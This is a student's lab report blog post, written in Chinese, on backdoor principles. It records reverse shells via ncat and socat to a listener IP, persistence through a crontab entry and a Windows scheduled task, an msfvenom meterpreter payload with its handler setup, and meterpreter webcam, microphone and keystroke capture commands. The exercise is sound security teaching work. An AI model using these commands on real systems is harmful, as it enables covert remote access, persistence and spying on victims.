Exp2-后门原理与实践

一、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 答:喜欢在百度云上下载文件(游戏,音乐,视频),然后不仔细查看文件内容,进而被文件内的某些可执行文件进入我的系统。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 答:对于Windows,可以通过特定的exe可执行文件来启动,或通过计算机管理,在系统工具中的任务计划程序中创建任务,通过socat来进入;对于linux,也可以通过定时任务的设置进入后门。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 答:很简单容易地获取目标主机的摄像头、录音器功能,所以我们应该非必要时刻把主机的这些功能关闭,或者对主机定期查杀病毒。这些功能让我觉得自己的电脑非常的不安全,甚至有一丝可怕。

(4)如何发现自己有系统有没有被安装后门?

  • 答:定期使用安全软件对主机进行一个全面的查杀病毒和补丁。尽量不要随意信任一些软件的权限申请,如若需要,则必须时刻注意主机的状态。

二、实验总结与体会

  • 本次实验,对于我来说还是有不少问题,难度较大,在学习老师的教学视频和同学们的实验报告的过程中,在进行实验的过程中依然有着不少问题,通过这次实验,让我知道了防火墙,安全软件的重要性,如果没有这些软件,我们的电脑不知道啥时候就被攻击了,而且这些进入后门的方式各式各样的,无孔不入的。让我感觉到了很可怕。

三、实践过程记录

(1)使用netcat获取主机操作Shell,cron启动 (1分)

  • (a)首先在kali端输入ifconfig查找IP地址
    在Windows端输入ipconfig查找主机IP地址。

  • (b)接下来在Linux端运行监听指令:ncat.exe -l -p 1224
    在主机输入反弹连接:ncat -e cmd.exe 192.168.142.135 1224
    如图所示是Linux成功获取Windowsshell并且运行dir指令截图:

  • (c)在主机输入监听指令ncat.exe -l -p 1224
    在虚拟机输入反弹连接:ncat 192.168.3.252 1224 -e /bin/sh,
    并且在主机输入ls查看kali虚拟机列表:

  • (d)在虚拟机启用cro并在主机进行监听
    首先在kali虚拟机输入crontab -e,然后输入2选择vim编辑器

  • 并且在最后一行添加10 * * * * nc 192.168.3.252 1224 -e /bin/sh,即在每个小时的第10分钟反向连接Windows主机的1206端口

![](https://img2023.cnblogs.com/blog/2166392/202303/2166392-20230323215328614-755919100.png)

此处有crontab命令选项:
-u指定一个用户
-l列出某个用户的任务计划
-r删除某个用户的任务(不添加用户即删除所有的任务)
-e编辑某个用户的任务

cron文件语法:
分     小时    日       月       星期     命令

0-59   0-23   1-31   1-12     0-6     command     (取值范围,0表示周日一般一行对应一个任务)

Minute  Hour   Day    Month   Dayofweek   command
分钟      小时      天     月        天每星期       命令
  • 在主机cmd输入ncat.exe -l -p 1224等待每小时的第10分钟定时反向连接启动

(2)使用socat获取主机操作Shell, 任务计划启动 (1分)

  • 使用socat -h查看kali中的socat是否正常。

  • 在Windows中按Win+R,再输入compmgmt.msc打开计算机管理

  • 在系统工具中的任务计划程序中创建任务,命名为20201224
    设置一个触发器,这里设置当锁定任何用户工作站时

  • 新建操作,找到socat.exe文件,并添加参数tcp:192.168.3.252:1224 exec:cmd.exe,pty,stderr

  • 先在kali中输入socat top-listen:1224 -监听端口,然后使用Win+L```将电脑锁屏再打开,让我们设置的任务定向启动socat.exe:

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

  • 在kali输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.252 LPORT=1224 -f exe > 20201224_backdoor.exe生成后门可执行程序
    在Windows输入nc 192.168.3.252 1224 < 20201224_backdoor.exe打开监听

  • 然后在Linux端用nc 192.168.3.252 1224 < 20201224_backdoor.exe将生成的20201224_backdoor.exe传到Windows端

  • 在Linux上使用msfconsole指令进入msf控制台

对msf控制台进行配置,依次输入以下命令:
use exploit/multi/handler #使用监听模块,设置payload
set LHOST 192.168.3.252 #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1224
set payload windows/meterpreter/reverse_tcp #使用和生成后门程序时相同的payload
输入run开始监听,在Windows端在打开20201224_backdoor.exe后,在Linux端成功获取到Windows的shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (1分)

  • (a)获取摄像头
    先输入webcam_list查看摄像头列表,再输入webcam_snap指令控制摄像头进行拍照

  • (b)获取音频
    输入record_mic进行录音

  • (c)获取击键记录
    输入keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录

posted @   20201224吴卓航  阅读(50)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示